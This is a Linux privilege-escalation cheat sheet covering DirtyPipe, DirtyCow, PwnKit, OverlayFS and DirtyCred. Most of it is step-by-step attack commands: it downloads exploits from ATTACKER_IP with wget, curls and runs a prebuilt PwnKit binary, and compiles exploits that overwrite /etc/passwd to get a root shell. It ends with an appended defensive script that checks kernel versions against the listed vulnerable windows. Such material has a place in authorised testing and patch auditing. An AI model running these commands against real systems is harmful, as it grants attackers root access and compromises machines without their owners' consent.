## Methodology

`uname -r` → check kernel version → find exploit → compile → execute
## Linux Exploit Suggester

### les.sh (Recommended)

https://github.com/The-Z-Labs/linux-exploit-suggester

```bash
# Transfer to target
wget http://ATTACKER_IP/les.sh
chmod +x les.sh
./les.sh
```

### linux-exploit-suggester-2 (Perl)

https://github.com/jondonas/linux-exploit-suggester-2

```bash
perl les2.pl
```
## CVE-2022-0847 — DirtyPipe (Kernel 5.8 - 5.16.11)

Overwrite read-only files via pipe splice. Instant root.

### Check

```bash
uname -r
# Vulnerable: 5.8 <= kernel < 5.16.11
```

### Exploit

https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits

```bash
gcc exploit-1.c -o exploit
./exploit
# Overwrites /etc/passwd → root shell
```

Alternative (SUID method):

```bash
gcc exploit-2.c -o exploit
./exploit /usr/bin/su
```
## CVE-2016-5195 — DirtyCow (Kernel 2.6.22 - 4.8.3)

Race condition in copy-on-write. Write to read-only mappings.

### Check

```bash
uname -r
# Vulnerable: 2.6.22 <= kernel <= 4.8.3
```

### Exploit — Overwrite /etc/passwd

https://github.com/firefart/dirtycow

```bash
gcc -pthread dirty.c -o dirty -lcrypt
./dirty newpassword
# Creates user 'firefart' with root UID
su firefart
```

### Exploit — SUID Method

https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs

```bash
gcc -pthread cowroot.c -o cowroot
./cowroot
```
## CVE-2021-4034 — PwnKit (pkexec)

Polkit pkexec local privilege escalation. Works on almost all Linux distros.

### Check

```bash
pkexec --version
# Vulnerable: polkit < 0.120
```

### Exploit

https://github.com/ly4k/PwnKit

```bash
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x PwnKit
./PwnKit
```

C version:

https://github.com/arthepsy/CVE-2021-4034

```bash
gcc cve-2021-4034.c -o pwnkit
./pwnkit
```
## CVE-2021-3493 — OverlayFS (Ubuntu)

Ubuntu kernel overlay filesystem privilege escalation.

Vulnerable: Ubuntu 14.04 - 20.10

https://github.com/briskets/CVE-2021-3493

```bash
gcc exploit.c -o exploit
./exploit
```
## CVE-2022-2588 — Dirty Cred (Kernel 5.x)

https://github.com/Markakd/CVE-2022-2588

```bash
gcc exploit.c -o exploit -lpthread
./exploit
```
## CVE-2023-0386 — OverlayFS (Kernel < 6.2)

https://github.com/xkaneiki/CVE-2023-0386

```bash
make all
# Terminal 1
./fuse ./ovlcap/lower ./gc
# Terminal 2
./exp
```
## Compile on Attacker (Cross-Compile)

If the target has no gcc:

```bash
# Match target architecture
gcc -static -o exploit exploit.c
# Transfer to target
python3 -m http.server 80
```

On target:

```bash
wget http://ATTACKER_IP/exploit
chmod +x exploit
./exploit
```
## Quick Reference

| CVE | Affected versions | Year | Reliability |
|---|---|---|---|
| DirtyCow (CVE-2016-5195) | Kernel 2.6.22 - 4.8.3 | 2016 | High |
| PwnKit (CVE-2021-4034) | Any kernel (polkit < 0.120) | 2021 | Very High |
| OverlayFS (CVE-2021-3493) | Ubuntu 14.04 - 20.10 | 2021 | High |
| Baron Samedit (CVE-2021-3156) | sudo < 1.9.5p2 | 2021 | High |
| DirtyPipe (CVE-2022-0847) | Kernel 5.8 - 5.16.11 | 2022 | Very High |
| DirtyCred (CVE-2022-2588) | Kernel 5.x | 2022 | Medium |
| OverlayFS (CVE-2023-0386) | Kernel < 6.2 | 2023 | High |
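The "Check" steps above (`uname -r`, `pkexec --version`) and the version windows in the Quick Reference table all come down to one operation: comparing a dotted version string against a range, where `5.10` must sort before `5.9.99` numerically rather than lexically and suffixes such as `-142-generic` must be ignored. The script below is an added example and not part of the original page or any of the linked exploit repositories: it implements that comparison with POSIX `awk`, encodes only the windows the table states (for CVE-2023-0386 the table gives just the upper bound, so older kernels match as well), and prints which windows a given kernel or polkit version falls inside. The function names (`vercmp`, `kernel_cve_matches`, `polkit_vulnerable`, `kernel_audit`) and the sample versions in the comments are constructed for this example.

```shell
#!/bin/sh
# Added example (editor's addition, not from the original page): compare a
# kernel or polkit version string against the version windows the cheat sheet
# lists. Function names and sample versions are constructed for this example.
# Caveat: distributions backport fixes without bumping the upstream version,
# so a match here is a prompt to check the distro changelog, not proof.

# vercmp A B: print -1, 0 or 1 for A < B, A == B, A > B.
# Suffixes such as "-142-generic" or "+" are stripped; missing components are 0.
vercmp() {
  awk -v a="$1" -v b="$2" 'BEGIN {
    sub(/[-+].*$/, "", a); sub(/[-+].*$/, "", b)
    na = split(a, x, "."); nb = split(b, y, ".")
    n = (na > nb) ? na : nb
    for (i = 1; i <= n; i++) {
      p = (i <= na) ? x[i] + 0 : 0
      q = (i <= nb) ? y[i] + 0 : 0
      if (p < q) { print -1; exit }
      if (p > q) { print 1; exit }
    }
    print 0
  }'
}

# Boolean helpers built on vercmp: ge A B is true when A >= B, and so on.
ge() { [ "$(vercmp "$1" "$2")" -ge 0 ]; }
le() { [ "$(vercmp "$1" "$2")" -le 0 ]; }
lt() { [ "$(vercmp "$1" "$2")" -lt 0 ]; }

# kernel_cve_matches VERSION: print, one per line, the kernel CVEs from the
# Quick Reference table whose stated version window contains VERSION.
kernel_cve_matches() {
  v=$1
  ge "$v" 2.6.22 && le "$v" 4.8.3   && echo CVE-2016-5195  # DirtyCow: 2.6.22 <= v <= 4.8.3
  ge "$v" 5.8    && lt "$v" 5.16.11 && echo CVE-2022-0847  # DirtyPipe: 5.8 <= v < 5.16.11
  ge "$v" 5.0    && lt "$v" 6.0     && echo CVE-2022-2588  # DirtyCred: 5.x
  lt "$v" 6.2                       && echo CVE-2023-0386  # OverlayFS: table gives only "< 6.2"
  return 0
}

# polkit_vulnerable VERSION: true when polkit < 0.120 (the page's PwnKit check).
polkit_vulnerable() { lt "$1" 0.120; }

# kernel_audit VERSION: human-readable report for one kernel version string.
kernel_audit() {
  hits=$(kernel_cve_matches "$1")
  if [ -z "$hits" ]; then
    echo "kernel $1: no listed kernel CVE window matches"
  else
    echo "kernel $1: version falls inside the window for:"
    echo "$hits" | sed 's/^/  /'
    echo "  (verify against the distro changelog; backported fixes do not change uname -r)"
  fi
}

# Audit the version given as the first argument, or the running kernel.
kernel_audit "${1:-$(uname -r)}"
```

Run it with no arguments to audit the running kernel, or pass a version string such as `5.10.0-kali` to audit a kernel seen elsewhere (a `uname -r` line in a collected log, for instance). Treat the output as a list of windows to verify rather than a verdict: the DirtyPipe fix, for example, also landed in the 5.15.25 and 5.10.102 stable releases, so a 5.15.30 kernel sits inside the table's 5.8 to 5.16.11 window yet is patched, and a distro kernel can carry the fix at an even lower reported version. The Ubuntu and sudo rows of the table are deliberately left out because they are not kernel-version windows; `sudo --version` and the distro release would need their own comparisons.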